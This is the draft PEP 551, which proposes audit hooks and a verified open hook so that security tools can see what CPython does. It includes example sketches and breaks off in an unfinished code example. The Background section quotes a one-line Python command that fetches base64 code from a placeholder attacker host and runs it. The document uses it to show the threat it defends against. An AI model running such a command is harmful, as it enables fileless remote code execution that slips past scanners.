PEP: 551
Title: Security transparency in the Python runtime
Version: $Revision$
Last-Modified: $Date$
Author: Steve Dower <steve.dower@python.org>
Status: Draft
Type: Standards Track
Content-Type: text/x-rst
Created: 23-Aug-2017
Python-Version: 3.7
Post-History: 24-Aug-2017 (security-sig), 28-Aug-2017 (python-dev)

Abstract
========

This PEP describes additions to the Python API and specific behaviors
for the CPython implementation that make actions taken by the Python
runtime visible to security and auditing tools. The goals in order of
increasing importance are to prevent malicious use of Python, to detect
and report on malicious use, and most importantly to detect attempts to
bypass detection. Most of the responsibility for implementation falls
on users, who must customize and build Python for their own
environment.

We propose two small sets of public APIs to enable users to reliably
build their copy of Python without having to modify the core runtime,
protecting future maintainability. We also discuss recommendations for
users to help them develop and configure their copy of Python.

Background
==========

Software vulnerabilities are generally seen as bugs that enable remote
or elevated code execution. However, in our modern connected world, the
more dangerous vulnerabilities are those that enable advanced persistent
threats (APTs). APTs are achieved when an attacker is able to penetrate
a network, establish their software on one or more machines, and over
time extract data or intelligence. Some APTs may make themselves known
by maliciously damaging data (e.g., `WannaCrypt
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/WannaCrypt>`_)
or hardware (e.g., `Stuxnet
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?name=Win32/Stuxnet>`_).
Most attempt to hide their existence and avoid detection. APTs often use
a combination of traditional vulnerabilities, social engineering,
phishing (or spear-phishing), thorough network analysis, and an
understanding of misconfigured environments to establish themselves and
do their work.

The first infected machines may not be the final target and may not
require special privileges. For example, an APT that is established as a
non-administrative user on a developer’s machine may have the ability to
spread to production machines through normal deployment channels. It is
common for APTs to persist on as many machines as possible, with sheer
weight of presence making them difficult to remove completely.

Whether an attacker is seeking to cause direct harm or hide their
tracks, the biggest barrier to detection is a lack of insight. System
administrators with large networks rely on distributed logs to
understand what their machines are doing, but logs are often filtered to
show only error conditions. APTs that are attempting to avoid detection
will rarely generate errors or abnormal events. Reviewing normal
operation logs involves a significant amount of effort, though work is
underway by a number of companies to enable automatic anomaly detection
within operational logs. The tools preferred by attackers are ones that
are already installed on the target machines, since log messages from
these tools are often expected and ignored in normal use.

At this point, we are not going to spend further time discussing the
existence of APTs or methods and mitigations that do not apply to this
PEP. For further information about the field, we recommend reading or
watching the resources listed under `Further Reading`_.

Python is a particularly interesting tool for attackers due to its
prevalence on server and developer machines, its ability to execute
arbitrary code provided as data (as opposed to native binaries), and its
complete lack of internal auditing. This allows attackers to download,
decrypt, and execute malicious code with a single command::

    python -c "import urllib.request, base64;
        exec(base64.b64decode(
            urllib.request.urlopen('http://my-exploit/py.b64').read()
        ).decode())"

This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being
written to disk (base64 is often sufficient to bypass these checks). It
also bypasses protections such as file access control lists or
permissions (no file access occurs), approved application lists
(assuming Python has been approved for other uses), and automated
auditing or logging (assuming Python is allowed to access the internet
or access another machine on the local network from which to obtain its
payload).

General consensus among the security community is that totally
preventing attacks is infeasible and defenders should assume that they
will often detect attacks only after they have succeeded. This is known
as the "assume breach" mindset. [1]_ In this scenario, protections such
as sandboxing and input validation have already failed, and the
important task is detection, tracking, and eventual removal of the
malicious code. To this end, the primary feature required from Python is
security transparency: the ability to see what operations the Python
runtime is performing that may indicate anomalous or malicious use.
Preventing such use is valuable, but secondary to the need to know that
it is occurring.

To summarise the goals in order of increasing importance:

* preventing malicious use is valuable
* detecting malicious use is important
* detecting attempts to bypass detection is critical

One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. [2]_

Generally, application and system configuration will determine which
events within a scripting engine are worth logging. However, given that
the value of many log events is not recognized until after an attack is
detected, it is important to capture as much as possible and filter
views rather than filtering at the source (see the No Easy Breach video
from `Further Reading`_). Events that are always of interest include
attempts to bypass auditing, attempts to load and execute code that is
not correctly signed or access-controlled, use of uncommon operating
system functionality such as debugging or inter-process inspection
tools, most network access and DNS resolution, and attempts to create
and hide files or configuration settings on the local machine.

To summarize, defenders have a need to audit specific uses of Python in
order to detect abnormal or malicious usage. Currently, the Python
runtime does not provide any ability to do this, which (anecdotally) has
led to organizations switching to other languages. The aim of this PEP
is to enable system administrators to deploy a security-transparent copy
of Python that can integrate with their existing auditing and protection
systems.

On Windows, some specific features that may be enabled by this include:

* Script Block Logging [3]_
* DeviceGuard [4]_
* AMSI [5]_
* Persistent Zone Identifiers [6]_
* Event tracing (which includes event forwarding) [7]_

On Linux, some specific features that may be integrated are:

* gnupg [8]_
* sd_journal [9]_
* OpenBSM [10]_
* syslog [11]_
* auditd [12]_
* SELinux labels [13]_
* check execute bit on imported modules

On macOS, some features that may be used with the expanded APIs are:

* OpenBSM [10]_
* syslog [11]_

Overall, the ability to enable these platform-specific features on
production machines is highly appealing to system administrators and
will make Python a more trustworthy dependency for application
developers.

Overview of Changes
===================

True security transparency is not fully achievable by Python in
isolation. The runtime can audit as many events as it likes, but unless
the logs are reviewed and analyzed there is no value. Python may impose
restrictions in the name of security, but usability may suffer.
Different platforms and environments will require different
implementations of certain security features, and organizations with the
resources to fully customize their runtime should be encouraged to do
so.

The aim of these changes is to enable system administrators to integrate
Python into their existing security systems, without dictating what
those systems look like or how they should behave. We propose two API
changes to enable this: an Audit Hook and a Verified Open Hook. Neither
is set by default, and both require modifications to the entry point
binary to enable any functionality. For the purposes of validation and
example, we propose a new ``spython``/``spython.exe`` entry point
program that enables some basic functionality using these hooks.
**However, security-conscious organizations are expected to create their
own entry points to meet their own needs.**

Audit Hook
----------

In order to achieve security transparency, an API is required to raise
messages from within certain operations. These operations are typically
deep within the Python runtime or standard library, such as dynamic code
compilation, module imports, DNS resolution, or use of certain modules
such as ``ctypes``.

The new C APIs required for audit hooks are::

   /* Add an auditing hook */
   typedef int (*hook_func)(const char *event, PyObject *args);
   int PySys_AddAuditHook(hook_func hook);

   /* Raise an event with all auditing hooks */
   int PySys_Audit(const char *event, PyObject *args);

   /* Internal API used during Py_Finalize() - not publicly accessible */
   void _Py_ClearAuditHooks(void);

The new Python APIs for audit hooks are::

   # Add an auditing hook
   sys.addaudithook(hook: Callable[[str, tuple], None]) -> None

   # Raise an event with all auditing hooks
   sys.audit(str, *args) -> None


Hooks are added by calling ``PySys_AddAuditHook()`` from C at any time,
including before ``Py_Initialize()``, or by calling
``sys.addaudithook()`` from Python code. Hooks are never removed or
replaced, and existing hooks have an opportunity to refuse to allow new
hooks to be added (adding an audit hook is audited, and so preexisting
hooks can raise an exception to block the new addition).

When events of interest are occurring, code can either call
``PySys_Audit()`` from C (while the GIL is held) or ``sys.audit()``. The
string argument is the name of the event, and the tuple contains
arguments. A given event name should have a fixed schema for arguments,
and both arguments are considered a public API (for a given x.y version
of Python), and thus should only change between feature releases with
updated documentation.

When an event is audited, each hook is called in the order it was added
with the event name and tuple. If any hook returns with an exception
set, later hooks are ignored and *in general* the Python runtime should
terminate. This is intentional to allow hook implementations to decide
how to respond to any particular event. The typical responses will be to
log the event, abort the operation with an exception, or to immediately
terminate the process with an operating system exit call.
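
The ordering and abort behaviour described above can be sketched in
Python. This is a minimal illustration, assuming an interpreter that
provides ``sys.addaudithook()`` and ``sys.audit()`` as specified here
(CPython 3.8 and later do). The ``example.*`` event names and the
``attempt()`` helper are hypothetical and exist only for this sketch.

```python
import sys

calls = []  # (hook label, event name, args) in the order hooks ran


def log_hook(event, args):
    # First hook: record every example event before anything can abort it.
    if event.startswith("example."):
        calls.append(("log", event, args))


def deny_hook(event, args):
    # Second hook: abort one specific event by raising an exception.
    if event == "example.forbidden":
        calls.append(("deny", event, args))
        raise PermissionError("example.forbidden is not allowed")


def late_hook(event, args):
    # Third hook: skipped for any event that an earlier hook aborted.
    if event.startswith("example."):
        calls.append(("late", event, args))


# Hooks run in the order they were added.
for hook in (log_hook, deny_hook, late_hook):
    sys.addaudithook(hook)


def attempt(event, *args):
    """Raise an audit event and report whether a hook aborted it."""
    try:
        sys.audit(event, *args)
    except PermissionError as exc:
        return "aborted: {}".format(exc)
    return "allowed"
```

Calling ``attempt("example.forbidden", "x")`` reaches ``log_hook`` and
``deny_hook`` but never ``late_hook``. Real callers would normally let
the exception propagate rather than catch it as ``attempt()`` does.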

When an event is audited but no hooks have been set, the ``audit()``
function should impose minimal overhead. Ideally, each argument is a
reference to existing data rather than a value calculated just for the
auditing call.

As hooks may be Python objects, they need to be freed during
``Py_Finalize()``. To do this, we add an internal API
``_Py_ClearAuditHooks()`` that releases any ``PyObject*`` hooks that are
held, as well as any heap memory used. This is an internal function with
no public export, but it triggers an event for all audit hooks to ensure
that unexpected calls are logged.

See `Audit Hook Locations`_ for proposed audit hook points and schemas,
and the `Recommendations`_ section for discussion on
appropriate responses.

Verified Open Hook
------------------

Most operating systems have a mechanism to distinguish between files
that can be executed and those that cannot. For example, this may be an
execute bit in the permissions field, or a verified hash of the file
contents to detect potential code tampering. These are an important
security mechanism for preventing execution of data or code that is not
approved for a given environment. Currently, Python has no way to
integrate with these when launching scripts or importing modules.

The new public C API for the verified open hook is::

   /* Set the handler */
   typedef PyObject *(*handler_func)(const char *narrow,
                                     const wchar_t *wide);
   int PyOS_SetOpenForExecuteHandler(handler_func handler);

   /* Open a file using the handler */
   PyObject *PyOS_OpenForExec(PyObject *path);

The new public Python API for the verified open hook is::

   # Open a file using the handler
   os.open_for_exec(pathlike)

The ``os.open_for_exec()`` function is a drop-in replacement for
``open(pathlike, 'rb')``. Its default behaviour is to open a file for
raw, binary access - any more restrictive behaviour requires the use of
a custom handler. (Aside: since ``importlib`` requires access to this
function before the ``os`` module has been imported, it will be
available on the ``nt``/``posix`` modules, but the intent is that other
users will access it through the ``os`` module.)

A custom handler may be set by calling ``PyOS_SetOpenForExecuteHandler()``
from C at any time, including before ``Py_Initialize()``. However, if a
handler has already been set then the call will fail. When
``open_for_exec()`` is called with a handler set, the handler will be
passed the processed narrow or wide path, depending on platform, and its
return value will be returned directly. The returned object should be an
open file-like object that supports reading raw bytes. This is
explicitly intended to allow a ``BytesIO`` instance if the open handler
has already had to read the file into memory in order to perform
whatever verification is necessary to determine whether the content is
permitted to be executed.

Note that these handlers can import and call the ``_io.open()`` function
on CPython without triggering themselves.

If the handler determines that the file is not suitable for execution,
it should raise an exception of its choice, as well as raising any other
auditing events or notifications.
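
The handler contract above can be illustrated with a pure-Python
emulation. The functions proposed in this section are not assumed to
exist in any released interpreter, so ``set_open_for_exec_handler()``
and ``open_for_exec()`` below are hypothetical stand-ins, and the
SHA-256 allow-list is just one possible verification policy chosen for
the sketch.

```python
import hashlib
import io
import os
import tempfile

_handler = None  # hypothetical stand-in for the C-level handler slot


def set_open_for_exec_handler(handler):
    """Install the handler once; a second call fails, as described above."""
    global _handler
    if _handler is not None:
        raise RuntimeError("an open-for-execute handler is already set")
    _handler = handler


def open_for_exec(path):
    """Emulate the proposed function: defer to the handler if one is set."""
    path = os.fspath(path)
    if _handler is None:
        return open(path, "rb")
    return _handler(path)


APPROVED_SHA256 = set()  # hex digests of files approved for execution


def verifying_handler(path):
    # Read the file once, verify it, and hand back the verified bytes so
    # the content cannot change between the check and its use.
    with open(path, "rb") as f:
        data = f.read()
    digest = hashlib.sha256(data).hexdigest()
    if digest not in APPROVED_SHA256:
        raise PermissionError("{} is not approved for execution".format(path))
    return io.BytesIO(data)


set_open_for_exec_handler(verifying_handler)

# Usage: open a throwaway module before and after it has been approved.
with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "mod.py")
    with open(path, "wb") as f:
        f.write(b"x = 1\n")
    try:
        open_for_exec(path)
        rejected = False
    except PermissionError:
        rejected = True
    APPROVED_SHA256.add(hashlib.sha256(b"x = 1\n").hexdigest())
    with open_for_exec(path) as verified:
        content = verified.read()
```

Returning a ``BytesIO`` here is the case the text explicitly allows: the
handler already holds the verified bytes, so callers read exactly what
was checked.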

All import and execution functionality involving code from a file will
be changed to use ``open_for_exec()`` unconditionally. It is important
to note that calls to ``compile()``, ``exec()`` and ``eval()`` do not go
through this function - an audit hook that includes the code from these
calls will be added and is the best opportunity to validate code that is
read from the file. Given the current decoupling between import and
execution in Python, most imported code will go through both
``open_for_exec()`` and the audit hook for ``compile``, and so care should
be taken to avoid repeating verification steps.

.. note::
   The use of ``open_for_exec()`` by ``importlib`` is a valuable first
   defence, but should not be relied upon to prevent misuse. In
   particular, it is easy to monkeypatch ``importlib`` in order to
   bypass the call. Auditing hooks are the primary way to achieve
   security transparency, and are essential for detecting attempts to
   bypass other functionality.

API Availability
----------------

While all the functions added here are considered public and stable API,
the behavior of the functions is implementation specific. The
descriptions here refer to the CPython implementation, and while other
implementations should provide the functions, there is no requirement
that they behave the same.

For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but
may do nothing. This allows code to make calls to ``sys.audit()``
without having to test for existence, but it should not assume that its
call will have any effect. (Including existence tests in
security-critical code allows another vector to bypass auditing, so it
is preferable that the function always exist.)

``os.open_for_exec(pathlike)`` should at a minimum always return
``_io.open(pathlike, 'rb')``. Code using the function should make no
further assumptions about what may occur, and implementations other than
CPython are not required to let developers override the behavior of this
function with a hook.

Audit Hook Locations
====================

Calls to ``sys.audit()`` or ``PySys_Audit()`` will be added to the
following operations with the schema in Table 1. Unless otherwise
specified, the ability for audit hooks to abort any listed operation
should be considered part of the rationale for including the hook.

.. csv-table:: Table 1: Audit Hooks
   :header: "API Function", "Event Name", "Arguments", "Rationale"
   :widths: 2, 2, 3, 6

   ``PySys_AddAuditHook``, ``sys.addaudithook``, "", "Detect when new
   audit hooks are being added.
   "
   ``_PySys_ClearAuditHooks``, ``sys._clearaudithooks``, "", "Notifies
   hooks they are being cleaned up, mainly in case the event is
   triggered unexpectedly. This event cannot be aborted.
   "
   ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", "
   Detects any attempt to set the ``open_for_execute`` handler.
   "
   "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``,
   ``PyAST_obj2mod``", ``compile``, "``(code, filename_or_none)``", "
   Detect dynamic code compilation, where ``code`` could be a string or
   AST. Note that this will be called for regular imports of source
   code, including those that were opened with ``open_for_exec``.
   "
   "``exec``, ``eval``, ``run_mod``", ``exec``, "``(code_object,)``", "
   Detect dynamic execution of code objects. This only occurs for
   explicit calls, and is not raised for normal function invocation.
   "
   ``import``, ``import``, "``(module, filename, sys.path,
   sys.meta_path, sys.path_hooks)``", "Detect when modules are
   imported. This is raised before the module name is resolved to a
   file. All arguments other than the module name may be ``None`` if
   they are not used or available.
   "
   ``code_new``, ``code.__new__``, "``(bytecode, filename, name)``", "
   Detect dynamic creation of code objects. This only occurs for
   direct instantiation, and is not raised for normal compilation.
   "
   ``func_new_impl``, ``function.__new__``, "``(code,)``", "Detect
   dynamic creation of function objects. This only occurs for direct
   instantiation, and is not raised for normal compilation.
   "
   "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
   ``(module_or_path,)``", "Detect when native modules are used.
   "
   ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", "
   Collect information about specific symbols retrieved from native
   modules.
   "
   ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect
   when code is accessing arbitrary memory using ``ctypes``.
   "
   ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing
   the id of objects, which in CPython reveals information about
   memory layout.
   "
   ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect
   when code is accessing frames directly.
   "
   ``sys._current_frames``, ``sys._current_frames``, "", "Detect when
   code is accessing frames directly.
   "
   ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is
   injecting trace functions. Because of the implementation, exceptions
   raised from the hook will abort the operation, but will not be
   raised in Python code. Note that ``threading.setprofile`` eventually
   calls this function, so the event will be audited for each thread.
   "
   ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is
   injecting trace functions. Because of the implementation, exceptions
   raised from the hook will abort the operation, but will not be
   raised in Python code. Note that ``threading.settrace`` eventually
   calls this function, so the event will be audited for each thread.
   "
   ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "
   ", "Detect changes to async generator hooks.
   "
   ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "
   ", "Detect changes to async generator hooks.
   "
   ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "
   ", "Detect changes to the coroutine wrapper.
   "
   ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``, "
   ``(new_limit,)``", "Detect changes to the recursion limit.
   "
   ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``, "
   ``(interval_us,)``", "Detect changes to the switching interval.
   "
   "``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
   ``socket.getaddrinfo``, ``socket.getnameinfo``, ``socket.sendmsg``,
   ``socket.sendto``", ``socket.address``, "``(address,)``", "Detect
   access to network resources. The address is unmodified from the
   original call.
   "
   ``socket.__init__``, "socket()", "``(family, type, proto)``", "
   Detect creation of sockets. The arguments will be int values.
   "
   ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts
   to retrieve the current host name.
   "
   ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "
   Detect attempts to change the current host name. The name argument
   is passed as a bytes object.
   "
   "``socket.gethostbyname``, ``socket.gethostbyname_ex``",
   "``socket.gethostbyname``", "``(name,)``", "Detect host name
   resolution. The name argument is a str or bytes object.
   "
   ``socket.gethostbyaddr``, ``socket.gethostbyaddr``, "
   ``(address,)``", "Detect host resolution. The address argument is a
   str or bytes object.
   "
   ``socket.getservbyname``, ``socket.getservbyname``, "``(name,
   protocol)``", "Detect service resolution. The arguments are str
   objects.
   "
   "``socket.getservbyport``", ``socket.getservbyport``, "``(port,
   protocol)``", "Detect service resolution. The port argument is an
   int and protocol is a str.
   "
   "``member_get``, ``func_get_code``, ``func_get_[kw]defaults``
   ",``object.__getattr__``,"``(object, attr)``","Detect access to
   restricted attributes. This event is raised for any built-in
   members that are marked as restricted, and members that may allow
   bypassing imports.
   "
   "``_PyObject_GenericSetAttr``, ``check_set_special_type_attr``,
   ``object_set_class``, ``func_set_code``, ``func_set_[kw]defaults``","
   ``object.__setattr__``","``(object, attr, value)``","Detect monkey
   patching of types and objects. This event
   is raised for the ``__class__`` attribute and any attribute on
   ``type`` objects.
   "
   "``_PyObject_GenericSetAttr``",``object.__delattr__``,"``(object,
   attr)``","Detect deletion of object attributes. This event is raised
   for any attribute on ``type`` objects.
   "
   "``Unpickler.find_class``",``pickle.find_class``,"``(module_name,
   global_name)``","Detect imports and global name lookup when
   unpickling.
   "
   "``array_new``",``array.__new__``,"``(typecode, initial_value)``", "
   Detects creation of array objects.
   "

TODO - more hooks in ``_socket``, ``_ssl``, others?
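
As an illustration of consuming the events in Table 1, the following
sketch observes the ``compile`` and ``exec`` events for one piece of
source code. It assumes an interpreter that raises these two events
with the schemas listed above (CPython 3.8 and later do); the file name
``<audit-example>`` and the ``observe()`` hook are made up for the
example.

```python
import sys

EXAMPLE_FILENAME = "<audit-example>"  # hypothetical marker for our code

observed = []  # event names seen for the example source only


def observe(event, args):
    # "compile" carries (code, filename_or_none); "exec" carries
    # (code_object,). Everything unrelated to the example is ignored.
    if event == "compile" and args[1] == EXAMPLE_FILENAME:
        observed.append(event)
    elif event == "exec":
        if getattr(args[0], "co_filename", None) == EXAMPLE_FILENAME:
            observed.append(event)


sys.addaudithook(observe)

# Explicit compilation followed by explicit execution of the code object.
code = compile("answer = 6 * 7", EXAMPLE_FILENAME, "exec")
namespace = {}
exec(code, namespace)
```

Filtering inside the hook keeps the example quiet. A production hook
would forward every event instead, as discussed in `Recommendations`_.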

SPython Entry Point
===================

A new entry point binary will be added, called ``spython.exe`` on
Windows and ``spythonX.Y`` on other platforms. This entry point is
intended primarily as an example, as we expect most users of this
functionality to implement their own entry point and hooks (see
`Recommendations`_). It will also be used for tests.

Source builds will build ``spython`` by default, but distributions
should not include it except as a test binary. The python.org managed
binary distributions will not include ``spython``.

**Do not accept most command-line arguments**

The ``spython`` entry point requires a script file be passed as the
first argument, and does not allow any options. This prevents arbitrary
code execution from in-memory data or non-script files (such as pickles,
which can be executed using ``-m pickle <path>``).

Options ``-B`` (do not write bytecode), ``-E`` (ignore environment
variables) and ``-s`` (no user site) are assumed.

If a file with the same full path as the process with a ``._pth`` suffix
(``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it
will be used to initialize ``sys.path`` following the rules currently
described `for Windows
<https://docs.python.org/3/using/windows.html#finding-modules>`_.

When built with ``Py_DEBUG``, the ``spython`` entry point will allow a
``-i`` option with no other arguments to enter into interactive mode,
with audit messages being written to standard error rather than a file.
This is intended for testing and debugging only.

**Log security events to a file**

Before initialization, ``spython`` will set an audit hook that writes
events to a local file. By default, this file is the full path of the
process with a ``.log`` suffix, but may be overridden with the
``SPYTHONLOG`` environment variable (despite such overrides being
explicitly discouraged in `Recommendations`_).
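
A rough Python rendering of such a file-logging hook follows. The real
``spython`` hook would be written in C and installed before
initialization; this sketch only assumes that ``sys.addaudithook()`` and
``sys.audit()`` are available, and ``FileAuditLog`` is a hypothetical
name. A temporary directory stands in for the default log location.

```python
import os
import sys
import tempfile


class FileAuditLog:
    """Append every audit event to a text file (testing only)."""

    def __init__(self, path):
        # Open the file before the hook is installed, so that opening it
        # does not itself have to pass through this hook.
        self._file = open(path, "a", encoding="utf-8")
        self.active = True

    def __call__(self, event, args):
        if self.active:
            self._file.write("{} {!r}\n".format(event, args))

    def close(self):
        # Hooks cannot be removed, so the sketch merely goes quiet.
        self.active = False
        self._file.close()


with tempfile.TemporaryDirectory() as log_dir:
    # Stand-in default; spython uses its own executable path plus ".log".
    default_path = os.path.join(log_dir, "spython.log")
    log_path = os.environ.get("SPYTHONLOG", default_path)

    audit_log = FileAuditLog(log_path)
    sys.addaudithook(audit_log)
    sys.audit("example.event", "payload")
    audit_log.close()

    with open(log_path, encoding="utf-8") as f:
        logged = f.read().splitlines()
```

The ``close()`` method exists only so the sketch stops writing once the
demonstration is over. An entry point would keep logging for the
lifetime of the process.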

The audit hook will also abort all ``sys.addaudithook`` events,
preventing any other hooks from being added.

**Restrict importable modules**

Also before initialization, ``spython`` will set an open-for-execute
hook that validates all files opened with ``os.open_for_exec``. This
implementation will require all files to have a ``.py`` suffix (thereby
blocking the use of cached bytecode), and will raise a custom audit
event ``spython.open_for_exec`` containing ``(filename,
True_if_allowed)``.
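
The suffix check and custom event might look roughly like this in
Python. The real handler would be set from C; ``spython_open_for_exec()``
and ``record()`` are hypothetical names, and the sketch assumes only
that ``sys.audit()`` and ``sys.addaudithook()`` are available.

```python
import os
import sys
import tempfile

decisions = []  # (filename, allowed) pairs seen by the recording hook


def record(event, args):
    if event == "spython.open_for_exec":
        decisions.append(args)


sys.addaudithook(record)


def spython_open_for_exec(path):
    """Hypothetical Python rendering of the spython handler."""
    path = os.fspath(path)
    allowed = path.endswith(".py")
    # Report the decision before acting on it, so refusals are logged too.
    sys.audit("spython.open_for_exec", path, allowed)
    if not allowed:
        raise OSError("only .py files may be opened for execution: " + path)
    return open(path, "rb")


# Usage: a source file is accepted, cached bytecode is refused.
with tempfile.TemporaryDirectory() as tmp:
    source = os.path.join(tmp, "mod.py")
    cached = os.path.join(tmp, "mod.pyc")
    for name in (source, cached):
        with open(name, "wb") as f:
            f.write(b"")
    with spython_open_for_exec(source):
        source_opened = True
    try:
        spython_open_for_exec(cached)
        cached_opened = True
    except OSError:
        cached_opened = False
```

Raising the event before the refusal means the log records both
accepted and rejected files.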

On Windows, the hook will also open the file with flags that prevent any
other process from opening it with write access, which allows the hook
to perform additional validation on the contents with confidence that it
will not be modified between the check and use. Compilation will later
trigger a ``compile`` event, so there is no need to read the contents
now for AMSI, but other validation mechanisms such as DeviceGuard [4]_
should be performed here.

**Restrict globals in pickles**

The ``spython`` entry point will abort all ``pickle.find_class`` events
that use the default implementation. Overrides will not raise audit
events unless explicitly added, and so they will continue to be allowed.
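
A sketch of this restriction in Python follows, assuming an interpreter
whose default ``Unpickler.find_class`` raises the ``pickle.find_class``
event from Table 1 (CPython 3.8 and later do). The ``_restrict`` switch
and ``restricted_loads()`` are hypothetical; they keep the sketch from
affecting unrelated code, whereas ``spython`` would abort the event
unconditionally.

```python
import pickle
import sys

_restrict = False  # sketch-only switch; spython would always abort


def pickle_hook(event, args):
    if _restrict and event == "pickle.find_class":
        module_name, global_name = args
        raise pickle.UnpicklingError(
            "global {}.{} is not permitted".format(module_name, global_name))


sys.addaudithook(pickle_hook)


def restricted_loads(data):
    """Unpickle data while the hook refuses every global lookup."""
    global _restrict
    _restrict = True
    try:
        return pickle.loads(data)
    finally:
        _restrict = False


# Plain containers need no global lookup and load normally.
safe = restricted_loads(pickle.dumps([1, "two", 3.0]))

# A pickled reference to a global (here the built-in len) is refused.
try:
    restricted_loads(pickle.dumps(len))
    blocked = False
except pickle.UnpicklingError:
    blocked = True
```

Pickles built only from basic types never reach ``find_class`` and are
unaffected by the hook.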

Performance Impact
==================

The important performance impact is the case where events are being
raised but there are no hooks attached. This is the unavoidable case -
once a distributor or sysadmin begins adding audit hooks they have
explicitly chosen to trade performance for functionality. The
performance impact of using ``spython`` or of adding hooks is not of
interest here, since this is considered opt-in functionality.

Analysis using the ``performance`` tool shows no significant impact,
with the vast majority of benchmarks showing between 1.05x faster and
1.05x slower.

In our opinion, the performance impact of the set of auditing points
described in this PEP is negligible.

Recommendations
===============

Specific recommendations are difficult to make, as the ideal
configuration for any environment will depend on the user's ability to
manage, monitor, and respond to activity on their own network. However,
many of the proposals here do not appear to be of value without deeper
illustration. This section provides recommendations using the terms
**should** (or **should not**), indicating that we consider it dangerous
to ignore the advice, and **may**, indicating that the advice ought
to be considered for high-value systems. The term **sysadmins** refers
to whoever is responsible for deploying Python throughout your network;
different organizations may have an alternative title for the
responsible people.

Sysadmins **should** build their own entry point, likely starting from
the ``spython`` source, and directly interface with the security systems
available in their environment. The more tightly integrated, the less
likely a vulnerability will be found allowing an attacker to bypass
those systems. In particular, the entry point **should not** obtain any
settings from the current environment, such as environment variables,
unless those settings are otherwise protected from modification.

Audit messages **should not** be written to a local file. The
``spython`` entry point does this for example and testing purposes. On
production machines, tools such as ETW [7]_ or auditd [12]_ that are
intended for this purpose should be used.

The default ``python`` entry point **should not** be deployed to
production machines, but could be given to developers to use and test
Python on non-production machines. Sysadmins **may** consider deploying
a less restrictive version of their entry point to developer machines,
since any system connected to your network is a potential target.
Sysadmins **may** deploy their own entry point as ``python`` to obscure
the fact that extra auditing is being included.

Python deployments **should** be made read-only using any available
platform functionality after deployment and during use.

On platforms that support it, sysadmins **should** include signatures
for every file in a Python deployment, ideally verified using a private
certificate. For example, Windows supports embedding signatures in
executable files and using catalogs for others, and can use DeviceGuard
[4]_ to validate signatures either automatically or using an
``open_for_exec`` hook.

Sysadmins **should** log as many audited events as possible, and
**should** copy logs off of local machines frequently. Even if logs are
not being constantly monitored for suspicious activity, once an attack
is detected it is too late to enable auditing. Audit hooks **should
not** attempt to preemptively filter events, as even benign events are
useful when analyzing the progress of an attack. (Watch the "No Easy
Breach" video under `Further Reading`_ for a deeper look at this side of
things.)

Most actions **should not** be aborted if they could ever occur during
normal use or if preventing them will encourage attackers to work around
them. As described earlier, awareness is a higher priority than
prevention. Sysadmins **may** audit their Python code and abort
operations that are known to never be used deliberately.

Audit hooks **should** write events to logs before attempting to abort.
As discussed earlier, it is more important to record malicious actions
than to prevent them.

Sysadmins **should** identify correlations between events, as a change
to correlated events may indicate misuse. For example, module imports
will typically trigger the ``import`` auditing event, followed by an
``open_for_exec`` call and usually a ``compile`` event. Attempts to
bypass auditing will often suppress some but not all of these events. So
if the log contains ``import`` events but not ``compile`` events,
investigation may be necessary.
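
One simple way to look for this pattern is sketched below. The heuristic
is an assumption made for illustration: it flags any ``import`` event
that is not followed by a ``compile`` event before the next ``import``
event. Built-in and extension modules would trigger false positives, so
a real analysis needs more context. The sample log is invented for the
example.

```python
def imports_missing_compile(events):
    """Return module names whose ``import`` event had no ``compile``.

    ``events`` is an iterable of (event_name, args) pairs in log order.
    """
    suspicious = []
    pending = None  # module named by the most recent unmatched import
    for name, args in events:
        if name == "import":
            if pending is not None:
                suspicious.append(pending)
            pending = args[0]
        elif name == "compile":
            pending = None
    if pending is not None:
        suspicious.append(pending)
    return suspicious


# Invented sample log: "json" is compiled normally, "payload" is not.
sample_log = [
    ("import", ("json", None, None, None, None)),
    ("spython.open_for_exec", ("/lib/json/__init__.py", True)),
    ("compile", (b"...", "/lib/json/__init__.py")),
    ("import", ("payload", None, None, None, None)),
    ("exec", ("<code object>",)),
]

flagged = imports_missing_compile(sample_log)
```

Here ``flagged`` contains only ``"payload"``, the import that was
executed without a matching ``compile`` event.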

The first audit hook **should** be set in C code before
``Py_Initialize`` is called, and that hook **should** unconditionally
abort the ``sys.addaudithook`` event. The Python interface is primarily
intended for testing and development.

To prevent audit hooks being added on non-production machines, an entry
point **may** add an audit hook that aborts the ``sys.addaudithook`` event
but otherwise does nothing.
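
Such a do-nothing blocking hook could look like the sketch below. It is
written in Python for brevity, although the recommendation above is to
install the first hook from C. It assumes ``sys.addaudithook()`` raises
the ``sys.addaudithook`` event before adding a hook. In CPython 3.8 and
later, a ``RuntimeError`` raised by an existing hook prevents the
addition and is suppressed, so the caller sees no error; the
``try``/``except`` covers runtimes that surface it instead.

```python
import sys

late_events = []  # stays empty if the second hook was refused


def block_new_hooks(event, args):
    # Abort the event that announces a new hook; ignore everything else.
    if event == "sys.addaudithook":
        raise RuntimeError("audit hooks may not be added")


def late_hook(event, args):
    late_events.append(event)


sys.addaudithook(block_new_hooks)

try:
    sys.addaudithook(late_hook)  # refused by block_new_hooks
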